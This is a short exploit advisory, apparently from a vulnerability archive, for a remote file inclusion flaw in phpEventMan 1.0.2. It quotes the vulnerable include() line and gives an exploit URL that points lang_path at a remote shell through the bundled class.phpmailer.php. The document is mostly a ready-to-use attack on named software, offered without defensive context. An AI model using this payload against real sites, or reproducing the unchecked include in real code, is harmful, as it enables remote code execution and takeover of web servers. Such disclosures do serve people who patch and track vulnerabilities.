phpEventMan version 1.0.2 suffers from a remote file inclusion vulnerability.
1d57c73573b404847f9fc473199e63f00654220f57d61a9807f0f57d8d3aa846
___. .__.__ .__ __ __
____ ___.__.\_ |__ ___________ _____ |__| | |__|/ |______ _____/ |_
_/ ___< | | | __ \_/ __ \_ __ \/ \| | | | \ __\__ \ / \ __\
\ \___\___ | | \_\ \ ___/| | \/ Y Y \ | |_| || | / __ \| | \ |
\___ > ____| |___ /\___ >__| |__|_| /__|____/__||__| (____ /___| /__|
\/\/ \/ \/ \/ \/ \/
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Author: cybermilitant
Site: www.hacktime.org
E-Mail: cybermilitant.ht@gmail.com
Vulnerability: Remote File Include
Script: phpEventMan 1.0.2
Download: http://sourceforge.net/project/showfiles.php?group_id=169887
Vulnerable code:
include($lang_path.'phpmailer.lang-en.php');
Exploit:
http://localhost/phpevent/Shared/objects/thirdparty/class.phpmailer.php?lang_path=[shell]?